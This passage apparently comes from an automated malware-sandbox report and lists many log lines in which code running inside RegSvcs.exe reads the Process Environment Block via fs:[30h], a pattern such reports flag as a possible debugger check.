                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010E7370 mov eax, dword ptr fs:[00000030h]9_2_010E7370
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010E7370 mov eax, dword ptr fs:[00000030h]9_2_010E7370
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DE388 mov eax, dword ptr fs:[00000030h]9_2_010DE388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DE388 mov eax, dword ptr fs:[00000030h]9_2_010DE388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DE388 mov eax, dword ptr fs:[00000030h]9_2_010DE388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011B539D mov eax, dword ptr fs:[00000030h]9_2_011B539D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0113739A mov eax, dword ptr fs:[00000030h]9_2_0113739A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0113739A mov eax, dword ptr fs:[00000030h]9_2_0113739A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010D8397 mov eax, dword ptr fs:[00000030h]9_2_010D8397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010D8397 mov eax, dword ptr fs:[00000030h]9_2_010D8397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010D8397 mov eax, dword ptr fs:[00000030h]9_2_010D8397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110438F mov eax, dword ptr fs:[00000030h]9_2_0110438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110438F mov eax, dword ptr fs:[00000030h]9_2_0110438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011133A0 mov eax, dword ptr fs:[00000030h]9_2_011133A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011133A0 mov eax, dword ptr fs:[00000030h]9_2_011133A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011033A5 mov eax, dword ptr fs:[00000030h]9_2_011033A5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0119B3D0 mov ecx, dword ptr fs:[00000030h]9_2_0119B3D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010EA3C0 mov eax, dword ptr fs:[00000030h]9_2_010EA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010EA3C0 mov eax, dword ptr fs:[00000030h]9_2_010EA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010EA3C0 mov eax, dword ptr fs:[00000030h]9_2_010EA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010EA3C0 mov eax, dword ptr fs:[00000030h]9_2_010EA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010EA3C0 mov eax, dword ptr fs:[00000030h]9_2_010EA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010EA3C0 mov eax, dword ptr fs:[00000030h]9_2_010EA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010E83C0 mov eax, dword ptr fs:[00000030h]9_2_010E83C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010E83C0 mov eax, dword ptr fs:[00000030h]9_2_010E83C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010E83C0 mov eax, dword ptr fs:[00000030h]9_2_010E83C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010E83C0 mov eax, dword ptr fs:[00000030h]9_2_010E83C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0119C3CD mov eax, dword ptr fs:[00000030h]9_2_0119C3CD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011663C0 mov eax, dword ptr fs:[00000030h]9_2_011663C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F03E9 mov eax, dword ptr fs:[00000030h]9_2_010F03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F03E9 mov eax, dword ptr fs:[00000030h]9_2_010F03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F03E9 mov eax, dword ptr fs:[00000030h]9_2_010F03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F03E9 mov eax, dword ptr fs:[00000030h]9_2_010F03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F03E9 mov eax, dword ptr fs:[00000030h]9_2_010F03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F03E9 mov eax, dword ptr fs:[00000030h]9_2_010F03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F03E9 mov eax, dword ptr fs:[00000030h]9_2_010F03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F03E9 mov eax, dword ptr fs:[00000030h]9_2_010F03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011B53FC mov eax, dword ptr fs:[00000030h]9_2_011B53FC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011163FF mov eax, dword ptr fs:[00000030h]9_2_011163FF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010FE3F0 mov eax, dword ptr fs:[00000030h]9_2_010FE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010FE3F0 mov eax, dword ptr fs:[00000030h]9_2_010FE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010FE3F0 mov eax, dword ptr fs:[00000030h]9_2_010FE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0119F3E6 mov eax, dword ptr fs:[00000030h]9_2_0119F3E6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01117208 mov eax, dword ptr fs:[00000030h]9_2_01117208
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01117208 mov eax, dword ptr fs:[00000030h]9_2_01117208
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010D823B mov eax, dword ptr fs:[00000030h]9_2_010D823B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011B5227 mov eax, dword ptr fs:[00000030h]9_2_011B5227
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0116D250 mov ecx, dword ptr fs:[00000030h]9_2_0116D250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010D9240 mov eax, dword ptr fs:[00000030h]9_2_010D9240
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010D9240 mov eax, dword ptr fs:[00000030h]9_2_010D9240
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0119B256 mov eax, dword ptr fs:[00000030h]9_2_0119B256
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0119B256 mov eax, dword ptr fs:[00000030h]9_2_0119B256
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01168243 mov eax, dword ptr fs:[00000030h]9_2_01168243
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01168243 mov ecx, dword ptr fs:[00000030h]9_2_01168243
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010E6259 mov eax, dword ptr fs:[00000030h]9_2_010E6259
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0111724D mov eax, dword ptr fs:[00000030h]9_2_0111724D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DA250 mov eax, dword ptr fs:[00000030h]9_2_010DA250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01121270 mov eax, dword ptr fs:[00000030h]9_2_01121270
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01121270 mov eax, dword ptr fs:[00000030h]9_2_01121270
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01109274 mov eax, dword ptr fs:[00000030h]9_2_01109274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010D826B mov eax, dword ptr fs:[00000030h]9_2_010D826B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01190274 mov eax, dword ptr fs:[00000030h]9_2_01190274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01190274 mov eax, dword ptr fs:[00000030h]9_2_01190274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01190274 mov eax, dword ptr fs:[00000030h]9_2_01190274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01190274 mov eax, dword ptr fs:[00000030h]9_2_01190274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01190274 mov eax, dword ptr fs:[00000030h]9_2_01190274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01190274 mov eax, dword ptr fs:[00000030h]9_2_01190274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01190274 mov eax, dword ptr fs:[00000030h]9_2_01190274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01190274 mov eax, dword ptr fs:[00000030h]9_2_01190274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01190274 mov eax, dword ptr fs:[00000030h]9_2_01190274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01190274 mov eax, dword ptr fs:[00000030h]9_2_01190274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01190274 mov eax, dword ptr fs:[00000030h]9_2_01190274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01190274 mov eax, dword ptr fs:[00000030h]9_2_01190274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010E4260 mov eax, dword ptr fs:[00000030h]9_2_010E4260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010E4260 mov eax, dword ptr fs:[00000030h]9_2_010E4260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010E4260 mov eax, dword ptr fs:[00000030h]9_2_010E4260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011AD26B mov eax, dword ptr fs:[00000030h]9_2_011AD26B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011AD26B mov eax, dword ptr fs:[00000030h]9_2_011AD26B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0111329E mov eax, dword ptr fs:[00000030h]9_2_0111329E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0111329E mov eax, dword ptr fs:[00000030h]9_2_0111329E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01160283 mov eax, dword ptr fs:[00000030h]9_2_01160283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01160283 mov eax, dword ptr fs:[00000030h]9_2_01160283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01160283 mov eax, dword ptr fs:[00000030h]9_2_01160283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0111E284 mov eax, dword ptr fs:[00000030h]9_2_0111E284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0111E284 mov eax, dword ptr fs:[00000030h]9_2_0111E284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011B5283 mov eax, dword ptr fs:[00000030h]9_2_011B5283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011692BC mov eax, dword ptr fs:[00000030h]9_2_011692BC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011692BC mov eax, dword ptr fs:[00000030h]9_2_011692BC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011692BC mov ecx, dword ptr fs:[00000030h]9_2_011692BC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011692BC mov ecx, dword ptr fs:[00000030h]9_2_011692BC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F02A0 mov eax, dword ptr fs:[00000030h]9_2_010F02A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F02A0 mov eax, dword ptr fs:[00000030h]9_2_010F02A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F52A0 mov eax, dword ptr fs:[00000030h]9_2_010F52A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F52A0 mov eax, dword ptr fs:[00000030h]9_2_010F52A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F52A0 mov eax, dword ptr fs:[00000030h]9_2_010F52A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F52A0 mov eax, dword ptr fs:[00000030h]9_2_010F52A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011762A0 mov eax, dword ptr fs:[00000030h]9_2_011762A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011762A0 mov ecx, dword ptr fs:[00000030h]9_2_011762A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011762A0 mov eax, dword ptr fs:[00000030h]9_2_011762A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011762A0 mov eax, dword ptr fs:[00000030h]9_2_011762A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011762A0 mov eax, dword ptr fs:[00000030h]9_2_011762A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011762A0 mov eax, dword ptr fs:[00000030h]9_2_011762A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011772A0 mov eax, dword ptr fs:[00000030h]9_2_011772A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011772A0 mov eax, dword ptr fs:[00000030h]9_2_011772A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011A92A6 mov eax, dword ptr fs:[00000030h]9_2_011A92A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011A92A6 mov eax, dword ptr fs:[00000030h]9_2_011A92A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011A92A6 mov eax, dword ptr fs:[00000030h]9_2_011A92A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011A92A6 mov eax, dword ptr fs:[00000030h]9_2_011A92A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110F2D0 mov eax, dword ptr fs:[00000030h]9_2_0110F2D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110F2D0 mov eax, dword ptr fs:[00000030h]9_2_0110F2D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010E92C5 mov eax, dword ptr fs:[00000030h]9_2_010E92C5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010E92C5 mov eax, dword ptr fs:[00000030h]9_2_010E92C5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010EA2C3 mov eax, dword ptr fs:[00000030h]9_2_010EA2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010EA2C3 mov eax, dword ptr fs:[00000030h]9_2_010EA2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010EA2C3 mov eax, dword ptr fs:[00000030h]9_2_010EA2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010EA2C3 mov eax, dword ptr fs:[00000030h]9_2_010EA2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010EA2C3 mov eax, dword ptr fs:[00000030h]9_2_010EA2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110B2C0 mov eax, dword ptr fs:[00000030h]9_2_0110B2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110B2C0 mov eax, dword ptr fs:[00000030h]9_2_0110B2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110B2C0 mov eax, dword ptr fs:[00000030h]9_2_0110B2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110B2C0 mov eax, dword ptr fs:[00000030h]9_2_0110B2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110B2C0 mov eax, dword ptr fs:[00000030h]9_2_0110B2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110B2C0 mov eax, dword ptr fs:[00000030h]9_2_0110B2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110B2C0 mov eax, dword ptr fs:[00000030h]9_2_0110B2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DB2D3 mov eax, dword ptr fs:[00000030h]9_2_010DB2D3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DB2D3 mov eax, dword ptr fs:[00000030h]9_2_010DB2D3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DB2D3 mov eax, dword ptr fs:[00000030h]9_2_010DB2D3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0119F2F8 mov eax, dword ptr fs:[00000030h]9_2_0119F2F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F02E1 mov eax, dword ptr fs:[00000030h]9_2_010F02E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F02E1 mov eax, dword ptr fs:[00000030h]9_2_010F02E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F02E1 mov eax, dword ptr fs:[00000030h]9_2_010F02E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010D92FF mov eax, dword ptr fs:[00000030h]9_2_010D92FF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011912ED mov eax, dword ptr fs:[00000030h]9_2_011912ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011912ED mov eax, dword ptr fs:[00000030h]9_2_011912ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011912ED mov eax, dword ptr fs:[00000030h]9_2_011912ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011912ED mov eax, dword ptr fs:[00000030h]9_2_011912ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011912ED mov eax, dword ptr fs:[00000030h]9_2_011912ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011912ED mov eax, dword ptr fs:[00000030h]9_2_011912ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011912ED mov eax, dword ptr fs:[00000030h]9_2_011912ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011912ED mov eax, dword ptr fs:[00000030h]9_2_011912ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011912ED mov eax, dword ptr fs:[00000030h]9_2_011912ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011912ED mov eax, dword ptr fs:[00000030h]9_2_011912ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011912ED mov eax, dword ptr fs:[00000030h]9_2_011912ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011912ED mov eax, dword ptr fs:[00000030h]9_2_011912ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011912ED mov eax, dword ptr fs:[00000030h]9_2_011912ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011912ED mov eax, dword ptr fs:[00000030h]9_2_011912ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011B52E2 mov eax, dword ptr fs:[00000030h]9_2_011B52E2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01117505 mov eax, dword ptr fs:[00000030h]9_2_01117505
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01117505 mov ecx, dword ptr fs:[00000030h]9_2_01117505
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011B4500 mov eax, dword ptr fs:[00000030h]9_2_011B4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011B4500 mov eax, dword ptr fs:[00000030h]9_2_011B4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011B4500 mov eax, dword ptr fs:[00000030h]9_2_011B4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011B4500 mov eax, dword ptr fs:[00000030h]9_2_011B4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011B4500 mov eax, dword ptr fs:[00000030h]9_2_011B4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011B4500 mov eax, dword ptr fs:[00000030h]9_2_011B4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011B4500 mov eax, dword ptr fs:[00000030h]9_2_011B4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0111D530 mov eax, dword ptr fs:[00000030h]9_2_0111D530
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0111D530 mov eax, dword ptr fs:[00000030h]9_2_0111D530
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011B5537 mov eax, dword ptr fs:[00000030h]9_2_011B5537
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110E53E mov eax, dword ptr fs:[00000030h]9_2_0110E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110E53E mov eax, dword ptr fs:[00000030h]9_2_0110E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110E53E mov eax, dword ptr fs:[00000030h]9_2_0110E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110E53E mov eax, dword ptr fs:[00000030h]9_2_0110E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110E53E mov eax, dword ptr fs:[00000030h]9_2_0110E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0119B52F mov eax, dword ptr fs:[00000030h]9_2_0119B52F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F0535 mov eax, dword ptr fs:[00000030h]9_2_010F0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F0535 mov eax, dword ptr fs:[00000030h]9_2_010F0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F0535 mov eax, dword ptr fs:[00000030h]9_2_010F0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F0535 mov eax, dword ptr fs:[00000030h]9_2_010F0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F0535 mov eax, dword ptr fs:[00000030h]9_2_010F0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F0535 mov eax, dword ptr fs:[00000030h]9_2_010F0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010ED534 mov eax, dword ptr fs:[00000030h]9_2_010ED534
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010ED534 mov eax, dword ptr fs:[00000030h]9_2_010ED534
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010ED534 mov eax, dword ptr fs:[00000030h]9_2_010ED534
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010ED534 mov eax, dword ptr fs:[00000030h]9_2_010ED534
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010ED534 mov eax, dword ptr fs:[00000030h]9_2_010ED534
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010ED534 mov eax, dword ptr fs:[00000030h]9_2_010ED534
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0118F525 mov eax, dword ptr fs:[00000030h]9_2_0118F525
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0118F525 mov eax, dword ptr fs:[00000030h]9_2_0118F525
